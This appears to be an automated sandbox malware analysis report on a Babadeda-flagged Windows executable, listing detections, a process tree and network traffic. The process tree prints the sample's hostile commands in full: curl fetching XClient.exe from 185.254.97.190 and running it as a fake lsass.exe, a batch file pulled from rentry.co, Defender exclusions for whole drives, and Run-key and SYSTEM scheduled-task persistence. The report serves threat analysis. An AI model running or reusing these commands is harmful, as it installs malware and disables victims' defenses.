Edit tour

Windows Analysis Report
nkYzjyrKYK.exe

Overview

General Information

Sample name:	nkYzjyrKYK.exe renamed because original name is a hash value
Original sample name:	0f5582439a6cf97fdbc8a7c0037d8ed10ce639c982cd433b83dd4159017fbe62.exe
Analysis ID:	1533955
MD5:	7f5e49656e9ad3806d18f23766f7cad5
SHA1:	593a914acb66225e5b4a813dff2b03f77025ec5a
SHA256:	0f5582439a6cf97fdbc8a7c0037d8ed10ce639c982cd433b83dd4159017fbe62
Tags:	185-254-97-190exeuser-JAMESWT_MHT
Infos:

Detection

Babadeda

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Yara detected Babadeda

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Connects to a pastebin service (likely for C&C)

Creates an autostart registry key pointing to binary in C:\Windows

Creates autostart registry keys with suspicious names

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Potential Credential Dumping Attempt Via PowerShell Remote Thread

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Uses cmd line tools excessively to alter registry or file data

Uses known network protocols on non-standard ports

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sleep loop found (likely to delay execution)

Uses 32bit PE files

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Classification

Process Tree

System is w10x64

nkYzjyrKYK.exe (PID: 5232 cmdline: "C:\Users\user\Desktop\nkYzjyrKYK.exe" MD5: 7F5E49656E9AD3806D18F23766F7CAD5)

conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 3880 cmdline: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

PING.EXE (PID: 6120 cmdline: ping 8.8.8.8 -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)

net.exe (PID: 2100 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 6200 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

reg.exe (PID: 6452 cmdline: reg add "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 768 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 2616 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanelNamespace" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

reg.exe (PID: 6240 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableCMD" /t REG_DWORD /d 1 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

powershell.exe (PID: 3496 cmdline: powershell.exe -Command "Disable-ComputerRestore -Drive 'C:'; Enable-ComputerRestore -Drive 'C:'" MD5: 04029E121A0CFA5991749937DD22A1D9)

ReAgentc.exe (PID: 4560 cmdline: reagentc.exe /disable MD5: A109CC3B919C7D40E4114966340F39E5)

attrib.exe (PID: 2328 cmdline: attrib +h ssh MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

curl.exe (PID: 5412 cmdline: curl -s -o C:\Users\user\AppData\Local\Temp\lsass.exe "http://185.254.97.190:2024/download/XClient.exe" MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

lsass.exe (PID: 3040 cmdline: lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

reg.exe (PID: 5808 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

schtasks.exe (PID: 5712 cmdline: SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5936 cmdline: schtasks /create /tn "winlogon" /tr "lsass.exe" /sc ONSTART /ru SYSTEM /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

net.exe (PID: 5268 cmdline: net session MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)

net1.exe (PID: 828 cmdline: C:\Windows\system32\net1 session MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)

powershell.exe (PID: 6684 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 5648 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'D:\'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 5776 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'" MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 2432 cmdline: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'" MD5: 04029E121A0CFA5991749937DD22A1D9)

icacls.exe (PID: 1936 cmdline: icacls "C:\Windows\appcompat\ssh" /deny user:F MD5: 48C87E3B3003A2413D6399EA77707F5D)

curl.exe (PID: 4512 cmdline: curl -s -o u32y.bat https://rentry.co/i7zgdqy6/raw/ MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)

lsass.exe (PID: 2432 cmdline: lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

WmiPrvSE.exe (PID: 4512 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

lsass.exe (PID: 5908 cmdline: lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

lsass.exe (PID: 1372 cmdline: "C:\Windows\system32\lsass.exe" MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

lsass.exe (PID: 2760 cmdline: "C:\Windows\system32\lsass.exe" MD5: A1CC00332BBF370654EE3DC8CDC8C95A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Babadeda	According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus users.	No Attribution	https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities	https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
nkYzjyrKYK.exe	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.nkYzjyrKYK.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security
0.0.nkYzjyrKYK.exe.400000.0.unpack	JoeSecurity_Babadeda	Yara detected Babadeda	Joe Security

Sigma Signatures

System Summary

Sigma detected: Potential Credential Dumping Attempt Via PowerShell Remote Thread

Source: Threat created

Author: oscd.community, Natalia Shornikova: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 2432, StartAddress: 93DEFF80, TargetImage: C:\Windows\System32\lsass.exe, TargetProcessId: 2432

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" , CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3880, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" , ProcessId: 6684, ProcessName: powershell.exe

Sigma detected: Schtasks Creation Or Modification With SYSTEM Privileges

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F, CommandLine: SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F, CommandLine|base64offset|contains: H!", Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3880, ParentProcessName: cmd.exe, ProcessCommandLine: SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F, ProcessId: 5712, ProcessName: schtasks.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3880, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'", ProcessId: 5776, ProcessName: powershell.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'", CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3880, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'", ProcessId: 5776, ProcessName: powershell.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" , CommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3880, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'" , ProcessId: 6684, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: lsass.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows-app

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f, CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f, CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3880, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f, ProcessId: 5808, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f, CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f, CommandLine|base64offset|contains: DA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3880, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "windows-app" /t REG_SZ /d "lsass.exe" /f, ProcessId: 5808, ProcessName: reg.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: curl -s -o u32y.bat https://rentry.co/i7zgdqy6/raw/, CommandLine: curl -s -o u32y.bat https://rentry.co/i7zgdqy6/raw/, CommandLine|base64offset|contains: r, Image: C:\Windows\System32\curl.exe, NewProcessName: C:\Windows\System32\curl.exe, OriginalFileName: C:\Windows\System32\curl.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2432, ProcessCommandLine: curl -s -o u32y.bat https://rentry.co/i7zgdqy6/raw/, ProcessId: 4512, ProcessName: curl.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -Command "Disable-ComputerRestore -Drive 'C:'; Enable-ComputerRestore -Drive 'C:'", CommandLine: powershell.exe -Command "Disable-ComputerRestore -Drive 'C:'; Enable-ComputerRestore -Drive 'C:'", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3880, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -Command "Disable-ComputerRestore -Drive 'C:'; Enable-ComputerRestore -Drive 'C:'", ProcessId: 3496, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: lsass.exe, CommandLine: lsass.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\lsass.exe, NewProcessName: C:\Windows\System32\lsass.exe, OriginalFileName: C:\Windows\System32\lsass.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: lsass.exe, ProcessId: 2432, ProcessName: lsass.exe

Persistence and Installation Behavior

Sigma detected: Schedule system process

Source: Process started

Author: Joe Security: Data: Command: SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F, CommandLine: SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F, CommandLine|base64offset|contains: H!", Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.bat C:\Users\user\Desktop\nkYzjyrKYK.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3880, ParentProcessName: cmd.exe, ProcessCommandLine: SCHTASKS /Create /TN "Windows Service" /TR "lsass.exe" /SC ONSTART /RU SYSTEM /F, ProcessId: 5712, ProcessName: schtasks.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nkYzjyrKYK.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: nkYzjyrKYK.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: nkYzjyrKYK.exe

Joe Sandbox ML: detected

Source: nkYzjyrKYK.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.3.16:443 -> 192.168.2.6:49713 version: TLS 1.2

Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\AppData\Local\Temp\D3B0.tmp	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp\D3B2.tmp	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\AppData\Local\Temp\D3B0.tmp\D3B1.tmp	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\nkYzjyrKYK.exe	File opened: C:\Users\user\AppData\	Jump to behavior

Networking

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: rentry.co

Uses known network protocols on non-standard ports

Source: unknown

Network traffic detected: HTTP traffic on port 49714 -> 2024

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping 8.8.8.8 -n 1

Source: global traffic

TCP traffic: 192.168.2.6:49714 -> 185.254.97.190:2024

Source: Joe Sandbox View

IP Address: 104.26.3.16 104.26.3.16

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521

Source: unknown	TCP traffic detected without corresponding DNS query: 185.254.97.190
Source: unknown	TCP traffic detected without corresponding DNS query: 185.254.97.190
Source: unknown	TCP traffic detected without corresponding DNS query: 185.254.97.190
Source: unknown	TCP traffic detected without corresponding DNS query: 185.254.97.190
Source: unknown	TCP traffic detected without corresponding DNS query: 185.254.97.190
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i7zgdqy6/raw/ HTTP/1.1Host: rentry.coUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /download/XClient.exe HTTP/1.1Host: 185.254.97.190:2024User-Agent: curl/7.83.1Accept: /

Source: global traffic

DNS traffic detected: DNS query: rentry.co

Source: curl.exe, 00000012.00000002.2298553951.00000166B8E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/down
Source: powershell.exe, 0000001E.00000002.2503147412.000002A9D3ECC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/downl
Source: powershell.exe, 00000023.00000002.2705174795.000002C799FB0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2714839780.000002C79BA60000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000024.00000002.2891665626.0000019EF0D67000.00000004.00000020.00020000.00000000.sdmp, icacls.exe, 00000024.00000002.2891766702.0000019EF0F70000.00000004.00000020.00020000.00000000.sdmp, u32y.bat.7.dr	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exe
Source: curl.exe, 00000012.00000002.2298553951.00000166B8E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exe)
Source: curl.exe, 00000012.00000002.2298553951.00000166B8E68000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2337641915.0000021E9CCB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exe2
Source: powershell.exe, 0000001E.00000002.2411777795.000002A9B9B87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exe7
Source: curl.exe, 00000012.00000002.2298553951.00000166B8E68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exe:
Source: powershell.exe, 00000019.00000002.2372968248.0000021EB6C60000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exeD
Source: powershell.exe, 0000001E.00000002.2411777795.000002A9B9B87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exeK
Source: powershell.exe, 00000023.00000002.2705174795.000002C799FB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exeL
Source: powershell.exe, 00000019.00000002.2375708119.0000021EB70A2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2374337905.0000021EB6D0E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2376447259.0000021EB714C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2338258747.0000021E9CF44000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2413515102.000002A9B9DC4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2503147412.000002A9D3F49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2502351134.000002A9D3BFE000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2413515102.000002A9B9DC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2413938120.000002A9BB660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2411777795.000002A9B9B87000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2543249790.000001FE61450000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2669344884.000001FE7B464000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2543249790.000001FE61454000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2670965885.000001FE7B6D4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2674736805.000001FE7B7F9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2543484309.000001FE614C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2713234858.000002C79A134000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2713234858.000002C79A130000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2870786219.000002C7B4068000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2714839780.000002C79BA60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2873253607.000002C7B426E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exeLOCALAPPDATA=C:
Source: powershell.exe, 0000001E.00000002.2506657477.000002A9D4041000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exeLOCALAPPDATAM
Source: curl.exe, 00000012.00000002.2298553951.00000166B8E68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.execN
Source: powershell.exe, 00000022.00000002.2543673208.000001FE61521000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exed
Source: powershell.exe, 0000001E.00000002.2411777795.000002A9B9B87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exev
Source: powershell.exe, 00000023.00000002.2705174795.000002C799FB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/download/XClient.exey
Source: curl.exe, 00000012.00000002.2298553951.00000166B8E71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.254.97.190:2024/downm
Source: powershell.exe, 00000023.00000002.2873253607.000002C7B426E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000001E.00000002.2503147412.000002A9D3F49000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micF1
Source: powershell.exe, 00000023.00000002.2873253607.000002C7B426E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000019.00000002.2362998078.0000021EAE89E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2490759240.000002A9CB86E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2647393715.000001FE7305E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2847319683.000002C7ABCDC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000023.00000002.2718284212.000002C79BE99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
